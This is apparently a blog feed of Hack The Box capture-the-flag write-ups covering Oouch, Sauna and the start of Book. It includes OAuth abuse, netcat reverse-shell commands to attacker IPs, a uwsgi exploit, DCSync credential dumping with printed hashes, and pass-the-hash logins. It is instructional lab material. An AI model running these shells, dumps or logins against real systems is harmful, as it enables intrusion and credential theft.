| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:6b:a7:2b:7a:21:9f:21:11:37:11:ed:50:4f:c6:1e (RSA)
|_ 256 d2:af:55:5c:06:0b:60:db:9c:78:47:b5:ca:f4:f1:04 (ED25519)
5000/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-title: Welcome to Oouch
|_Requested resource was http://10.10.10.177:5000/login?next=%2F
8000/tcp open rtsp
| fingerprint-strings:
| FourOhFourRequest, GetRequest, HTTPOptions:
| HTTP/1.0 400 Bad Request
| Content-Type: text/html
| Vary: Authorization
| <h1>Bad Request (400)</h1>
| RTSPRequest:
| RTSP/1.0 400 Bad Request
| Content-Type: text/html
| Vary: Authorization
| <h1>Bad Request (400)</h1>
| SIPOptions:
| SIP/2.0 400 Bad Request
| Content-Type: text/html
| Vary: Authorization
|_ <h1>Bad Request (400)</h1>
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 3 20:08:14 2020 -- 1 IP address (1 host up) scanned in 20.59 seconds
</code></pre></div></div>
<p>The FTP server allows for anonymous login. The banner says “qtc’s development server”, and it contains a single text file project.txt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Flask -> Consumer
Django -> Authorization Server
</code></pre></div></div>
<p>There is an http server on port 5000 with a login page. I make an account and log in with credentials xaero:xaero.</p>
<p><img src="https://jdmce.com/assets/oouch/login1.jpg" alt="Login Page" /></p>
<p>After looking around the application I notice a few interesting points, The about page contains a subtle clue about how to exploit the application. ` If you notice bugs inside the application or the authentication flow, please inform our system administrator.` And the contact page has a message box which appears to send directly to an admin account. To test this I can send a link to my machine and listen with nc, I get a response from the server which confirms that the server is processing these messages.</p>
<p><img src="https://jdmce.com/assets/oouch/contact.jpg" alt="Contact Page" /></p>
<p>Next I run dirbuster.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.10.10.177:5000/ <span class="nt">-w</span> /opt/SecLists/Discovery/Web-Content/big.txt
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> & Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url: http://10.10.10.177:5000/
<span class="o">[</span>+] Threads: 10
<span class="o">[</span>+] Wordlist: /opt/SecLists/Discovery/Web-Content/big.txt
<span class="o">[</span>+] Status codes: 200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent: gobuster/3.0.1
<span class="o">[</span>+] Timeout: 10s
<span class="o">===============================================================</span>
2020/07/03 20:47:51 Starting gobuster
<span class="o">===============================================================</span>
/about <span class="o">(</span>Status: 302<span class="o">)</span>
/contact <span class="o">(</span>Status: 302<span class="o">)</span>
/documents <span class="o">(</span>Status: 302<span class="o">)</span>
/home <span class="o">(</span>Status: 302<span class="o">)</span>
/login <span class="o">(</span>Status: 200<span class="o">)</span>
/logout <span class="o">(</span>Status: 302<span class="o">)</span>
/oauth <span class="o">(</span>Status: 302<span class="o">)</span>
/profile <span class="o">(</span>Status: 302<span class="o">)</span>
/register <span class="o">(</span>Status: 200<span class="o">)</span>
<span class="o">===============================================================</span>
2020/07/03 20:49:23 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>
<p>We get a /oauth page which gives us a new subdomain http://consumer.oouch.htb:5000/.
Logging in here takes us to another subdomain, http://authorization.oouch.htb:8000/.</p>
<p>Register on port 8000.</p>
<p>To exploit the authorization flow we need to extract the token-code before it is used, as it can only be used once. To do this use Burp Suite and forward packets during the authorization until you reach the packet that contains the token-code, then copy the token and drop the packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /oauth/connect/token?code=FdpuhkBq86DxiKLEsvwcZI2hgDC2ld HTTP/1.1
Host: consumer.oouch.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://authorization.oouch.htb:8000/oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read
Connection: close
Cookie: session=.eJxlj8FuAyEMRH-FcI4qwCyYfEXVHnqoosiASVbZZKtl9xTl3-u2x55GlufZMw99ahP1C3d9-HxotYroG_dOZ9Z7_ToxdVbTfFbjXa2zolJkqdbL2NWXeF708bn_z73xeezrQus439X79gu1bdqpD57KfGNFvMw7YY97CbBwv-jDumws01j1QWduQByThZitcxbBpJTIYIjmRzh5zmEYvIcIPlhTXS4JjDcuWyEx4kC1JI8mVWjFmhTIyTFHYABDQA9cRKutKDim2CrEGJJtWDJJhdKXdlrnK98lDzUvX9tA0GrJrQaPkBHJOB4GE2ICzA7QC7d1Xv5KOP38BnkSaI0.Xv-ZjQ.akKbed49LVvPMe5CbzI2QuO9eOE
Upgrade-Insecure-Requests: 1
</code></pre></div></div>
<p>Now that we have a token which has not yet been used, we can use the token with any user. So if we send the link <code class="language-plaintext highlighter-rouge">http://consumer.oouch.htb:5000/oauth/connect/token?code=FdpuhkBq86DxiKLEsvwcZI2hgDC2ld</code> to the admin via the contact page. And if the admin user “clicks” on the link which we established earlier will happen, this will link the token to the admins account.</p>
<p>After the link is clicked we can log in again via port 8000 and we will be logged in as the user that is linked to our authorization account, which is now the user qtc.</p>
<p><img src="https://jdmce.com/assets/oouch/qtclogin.jpg" alt="Logged in as qtc" /></p>
<p>We can now look around the application as the user qtc. Under Documents we find some credentials.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dev_access.txt:
develop:supermegasecureklarabubu123! -> Allows application registration.
o_auth_notes.txt:
/api/get_user -> user data. oauth/authorize -> Now also supports GET method.
todo.txt:
Chris mentioned all users could obtain my ssh key. Must be a joke...
</code></pre></div></div>
<p>If we navigate to authorization.oouch.htb:8000/oauth/authorize we can log in with the credentials in dev_access.txt.</p>
<p>This takes us to a page that allows us to register a new application. So I register a new application, making a note of the clientID and Client Secret.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ClientId: raJLWuJstNTX1etAwn64hSg2BiVYyI7LGMVBJ4Xk
Client Secret: exo6Yrof5DE14jc4jmdYM3aJE22UlEQqZuwFY2DTYg2JWef4qRUCc2caLianx5GOOaF0NDnJfIUJvAfiXpuamxMv7Tn4BBvseBhx5GNV9w7se45oSa3xpDe2LA7GiirO
</code></pre></div></div>
<p>I set Client type to public and authorization grant type to Authorization Code, and the redirect url to my ip, http://10.10.14.53:9001.</p>
<p>We can the send the following link via the contact page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://authorization.oouch.htb:8000/oauth/authorize/?client_id=raJLWuJstNTX1etAwn64hSg2BiVYyI7LGMVBJ4Xk&redirect_uri=http://10.10.14.53:9001&grant_type=authorization_code&client_secret=exo6Yrof5DE14jc4jmdYM3aJE22UlEQqZuwFY2DTYg2JWef4qRUCc2caLianx5GOOaF0NDnJfIUJvAfiXpuamxMv7Tn4BBvseBhx5GNV9w7se45oSa3xpDe2LA7GiirO
</code></pre></div></div>
<p>Listening on port 9001 with nc, we get a cookie!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>listening on <span class="o">[</span>any] 9001 ...
connect to <span class="o">[</span>10.10.14.53] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.177] 47610
GET /?error<span class="o">=</span>invalid_request&error_description<span class="o">=</span>Missing+response_type+parameter. HTTP/1.1
Host: 10.10.14.53:9001
User-Agent: python-requests/2.21.0
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept: <span class="k">*</span>/<span class="k">*</span>
Connection: keep-alive
Cookie: <span class="nv">sessionid</span><span class="o">=</span>fi4v1qnvk1knx2e6xwc39h0k4xn553pp<span class="p">;</span>
</code></pre></div></div>
<p>We can continue the authorization process:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-X</span> POST <span class="s1">'http://authorization.oouch.htb:8000/oauth/token/'</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/x-www-form-urlencoded"</span> <span class="nt">--data</span> <span class="s2">"grant_type=client_credentials&client_id=raJLWuJstNTX1etAwn64hSg2BiVYyI7LGMVBJ4Xk&client_secret=exo6Yrof5DE14jc4jmdYM3aJE22UlEQqZuwFY2DTYg2JWef4qRUCc2caLianx5GOOaF0NDnJfIUJvAfiXpuamxMv7Tn4BBvseBhx5GNV9w7se45oSa3xpDe2LA7GiirO"</span> <span class="nt">-L</span> <span class="nt">-s</span>
</code></pre></div></div>
<p>And we get back an access token.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"access_token": "s4nQEuR9zdEjuwYSev1ujxTpWTcx23", "expires_in": 600, "token_type": "Bearer", "scope": "read write"}
</code></pre></div></div>
<p>We can now use this access token to call get_ssh from the api.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://authorization.oouch.htb:8000/api/get_ssh/?access_token<span class="o">=</span>s4nQEuR9zdEjuwYSev1ujxTpWTcx23
</code></pre></div></div>
<p>Which returns the SSH key for qtc.</p>
<p><img src="https://jdmce.com/assets/oouch/qtcssh.jpg" alt="SSH as qtc" /></p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>linpeas.sh doesn’t return any useful information, although we do see that docker is running.</p>
<p>There is a hidden file in qtc’s home folder called .note.txt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Implementing an IPS using DBus and iptables == Genius?
</code></pre></div></div>
<p>running <code class="language-plaintext highlighter-rouge">ip add</code> we see a number of interfaces</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
<span class="nb">link</span>/ether 02:42:8f:65:6f:0b brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-cc6c78e0c7d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
<span class="nb">link</span>/ether 02:42:10:1f:7a:9e brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-cc6c78e0c7d0
valid_lft forever preferred_lft forever
inet6 fe80::42:10ff:fe1f:7a9e/64 scope <span class="nb">link
</span>valid_lft forever preferred_lft forever
...
</code></pre></div></div>
<p>We can SSH into the docker container as qtc. (I tried a number of IPs before it worked, you could write a script to ping IP addresses but I didn’t)</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-i</span> .ssh/id_rsa qtc@172.18.0.3
</code></pre></div></div>
<p>There is an interesting directory /code. It contains the code for the application running on port 5000.</p>
<p>Based on the note and poking around in the code directory we figure that we can exploit dbus to get root, however we cannot run dbus-send as the current user since dbus is owned by root.</p>
<p>We can begin by exploiting the uwsgi service.</p>
<p>We can get the version number:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uwsgi <span class="nt">--version</span>
2.0.17.1
</code></pre></div></div>
<p>Using this information we can find this <a href="https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py">exploit</a>.</p>
<p>The sz function requires a small change</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">sz</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="n">s</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">x</span> <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="nb">int</span><span class="p">)</span> <span class="k">else</span> <span class="nb">len</span><span class="p">(</span><span class="n">x</span><span class="p">))[</span><span class="mi">2</span><span class="p">:].</span><span class="n">rjust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">'0'</span><span class="p">)</span>
<span class="n">s</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
<span class="k">return</span> <span class="n">s</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</code></pre></div></div>
<p>First we need to transfer uwsgi_exp.py and nc to /tmp in the docker container, then run</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python ./uwsgi_exp.py <span class="nt">-m</span> unix <span class="nt">-u</span> /tmp/uwsgi.socket <span class="nt">-c</span> <span class="s2">"/tmp/nc -e /bin/bash 172.18.0.1 1234"</span>
</code></pre></div></div>
<p>We listen on oouch as qtc and get a shell as user www-data, this user can run dbus-send.</p>
<p>We can now use dbus send to get a shell as root, listening on port 9002 on the attacking machine run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dbus-send <span class="nt">--system</span> <span class="nt">--print-reply</span> <span class="nt">--dest</span><span class="o">=</span>htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block <span class="s2">"/bin/bash -i 2>&1 | nc 10.10.14.53 9002 >/tmp/.0;"</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@oouch:/root# <span class="nb">cat </span>root.txt
</code></pre></div></div>John McEwanOouch is a hard machine on Hack the Box, the foothold requires exploiting a misconfiguration in Oauth, then exploiting dbus to gain root access.[HTB] Sauna WriteUp2020-07-22T13:00:00+01:002020-07-22T13:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Sauna-Writeup<p><img src="https://jdmce.com/assets/sauna/sauna.jpg" alt="Sauna" /></p>
<p>Sauna is an easy Windows machine on Hack The box. A user is Kerberoastable which leads to a second user, then a DCSync attack leads to administrator.</p>
<p>Begin with an nmap scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sV -sC -oN nmap/nmap 10.10.10.175
# Nmap 7.80 scan initiated Mon May 18 20:41:01 2020 as: nmap -sV -sC -oN nmap/nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.078s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-19 03:45:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/18%Time=5EC2E4E6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 18 20:45:47 2020 -- 1 IP address (1 host up) scanned in 285.85 seconds
</code></pre></div></div>
<p>A number of ports are open, I start with the website running on port 80.</p>
<p>Not much can be found on the website. The about page lists members of the team, we can use this to generate usernames.</p>
<p><img src="https://jdmce.com/assets/sauna/meettheteam.jpg" alt="Meet the Team" /></p>
<p>I also ran ldapsearch against the machine, this reveals a user Hugo Smith, this turned out to be a rabbit hole, the real user we will need to go after is Fergus Smith.</p>
<p><code class="language-plaintext highlighter-rouge">ldapsearch -h 10.10.10.175 -p 389 -x -b 'dc=EGOTISTICAL-BANK,dc=local' > ldapsearch.txt</code></p>
<p>We can use <a href="https://github.com/ropnop/kerbrute">Kerbrute</a> to find valid usernames based on the names on the website. First I create a text file with some common username formats, then run Kerbrute.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./kerbrute userenum <span class="nt">--dc</span> 10.10.10.175 <span class="nt">-d</span> EGOTISTICAL-BANK.LOCAL usernames.txt
<span class="o">[</span>+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
<span class="o">[</span>+] VALID USERNAME: FSmith@EGOTISTICAL-BANK.LOCAL
</code></pre></div></div>
<p>Kerbrute identifies administrator and FSmith. This user is kerberoastable, we can use the <a href="https://github.com/SecureAuthCorp/impacket">impacket</a> script GetUserSPNs.py to get the TGT for FSmith.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python ./GetUserSPNs.py <span class="nt">-dc-ip</span> 10.10.10.175 <span class="nt">-no-pass</span> <span class="nt">-k</span> EGOTISTICAL-BANK.LOCAL/FSMITH
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Getting TGT <span class="k">for </span>FSMITH
<span class="nv">$krb5asrep$23$FSMITH</span>@EGOTISTICAL-BANK.LOCAL:237e94674c738dc86e2b8033c54e259b<span class="nv">$5f3de4694b4138fa0335eef7c60ccd8fa663e0be911497efcb80dcc211eaedebedfc1cc6aca1fa84b84a8968362093f3960128ba0dcae936c28bc9d674336f9556a8feb660103e5f0433e14ad0aa2552f57e7b65dc17a1447c51ddf9bf7535a0839184369058eed40ff444c15eee023abaa02581bc998025c7906f92d1599707a4d2b17a4f645716d961ae6a2ab6fdb0a027399b5756ea0394f8168a352a1fad39f61977581319b20078c5cea9f8333b4a1aedfe27b729299b429daec7c056e406ab0cff24f424c7b5f79baf702eedbe9dc164bc443b13d2671549510b25cc572b6def1fe10b152c74b42f324b2193d16e58c88ba8902a56d74182975a5f4e9b</span>
</code></pre></div></div>
<p>We can then use john to crack the hash.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>john FSMITHhash <span class="nt">--fork</span><span class="o">=</span>4 <span class="nt">-w</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
</code></pre></div></div>
<p>We get The password <code class="language-plaintext highlighter-rouge">Thestrokes23</code>.</p>
<p>Now we can use Evil-winrm to log into the box.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm <span class="nt">-i</span> 10.10.10.175 <span class="nt">-u</span> FSMITH <span class="nt">-p</span> Thestrokes23
</code></pre></div></div>
<p>C:\users\fsmith\desktop\user.txt</p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>Running winPEAS identifies a user svc_loanmanager which has autologon enabled and a default password.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="o">[</span>+] Looking <span class="k">for </span>AutoLogon credentials<span class="o">(</span>T1012<span class="o">)</span>
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK<span class="se">\s</span>vc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
</code></pre></div></div>
<p>We can open a new remote session as svc_loanmgr. (Under C:\users\ we see that the user logs in as svc_loanmgr not svc_loanmanager)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
</code></pre></div></div>
<p>We can now use Bloodhound to find potential paths to Domain Admin.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bloodhound-python <span class="nt">-u</span> svc_loanmgr <span class="nt">-p</span> Moneymakestheworldgoround! <span class="nt">-d</span> EGOTISTICAL-BANK.LOCAL <span class="nt">-ns</span> 10.10.10.175 <span class="nt">-c</span> All
</code></pre></div></div>
<p>Looking through the bloodhound results we find that the svc-loanmgr user can leak password hashes from the Domain controller using a DCSync attack. This is done by impersonating a new Domain Controller and requesting synchronisation with the existing DC.</p>
<p>We can use another Impacket script to perform this attack.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>secretsdump.py egotisticalbank/svc_loanmgr@10.10.10.175
Impacket v0.9.22.dev1+20200518.92028.525fa3d0 - Copyright 2020 SecureAuth Corporation
Password:
<span class="o">[</span>-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span><span class="nb">id</span>:rid:lmhash:nthash<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA<span class="nv">$:</span>1000:aad3b435b51404eeaad3b435b51404ee:ec048b4c6a47762bb522a7a4d302670b:::
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA<span class="nv">$:</span>aes256-cts-hmac-sha1-96:d1fb5eefd5831287eb278c5eb24ef19dee6f40aa3917ea8581762066ba88ac3b
SAUNA<span class="nv">$:</span>aes128-cts-hmac-sha1-96:f6e1682022cd138a00262c4910a7944b
SAUNA<span class="nv">$:</span>des-cbc-md5:46b0434967132c4f
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Cleaning up...
</code></pre></div></div>
<p>We can now use evil-winrm to pass the hash and login as Administrator.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm <span class="nt">-i</span> 10.10.10.175 <span class="nt">-u</span> administrator <span class="nt">-H</span> :d9485863c1e9e05851aa40cbb4ab9dff
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop> <span class="nb">type </span>root.txt
</code></pre></div></div>
<p>C:\users\administrator\desktop\root.txt</p>John McEwanSauna is an easy Windows machine on Hack The box. A user is Kerberoastable which leads to a second user, then a DCSync attack leads to administrator.[HTB] Book WriteUp2020-07-11T13:00:00+01:002020-07-11T13:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Book-WriteUp<p><img src="https://jdmce.com/assets/book/book.jpg" alt="Book" /></p>
<p>Book is a medium difficulty machine on Hack the Box.</p>
<p>As always we begin by running an nmap scan.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> scans/nmap 10.10.10.176
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Thu May 14 18:48:42 2020 as: nmap -sC -sV -oN scans/nmap 10.10.10.176</span>
Nmap scan report <span class="k">for </span>10.10.10.176
Host is up <span class="o">(</span>0.030s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 <span class="o">(</span>RSA<span class="o">)</span>
| 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open http Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not <span class="nb">set</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Thu May 14 18:48:50 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds</span>
</code></pre></div></div>
<p>There are two open ports 22 and 80, lets look at the website on port 80.</p>
<p><img src="https://jdmce.com/assets/book/login.jpg" alt="Login" /></p>
<p>We get a login page, so lets sign up. When we sign in we arrive at a Library’s website.</p>
<p><img src="https://jdmce.com/assets/book/library.jpg" alt="Library" /></p>
<p>After poking around a bit we find there is an admin account admin@book.htb on the contact page. We also see that the user’s page signifies the users role. There is also an upload function on the collections page.</p>
<p>Running Dirbuster also finds a /admin/ page.</p>
<p>We can try signing up for an account using the existing admin@book.htb account. Using BurpSuite we must pad out the request to 21 characters in order to bypass the JavaScript form validation. We can do this with spaces, the final character is arbitrary.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name=admin&email=admin@book.htb X&password=password1
</code></pre></div></div>
<p>After logging in to the admin account we see in the user settings that the account only has ‘User’ role. Using the admin credentials on the /admin/ page doesn’t work. If we repeat the process but change the name to admin1 we are able to login to the admin page.</p>
<p>On the Collections page, the admin is able to download the collection as a PDF. The site generates these PDFs using the info supplied by the user, so we can use DOM manipulation to execute javascript, as described in this article</p>
<p><a href="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html">www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically</a></p>
<p>The following payload will return /etc/passwd</p>
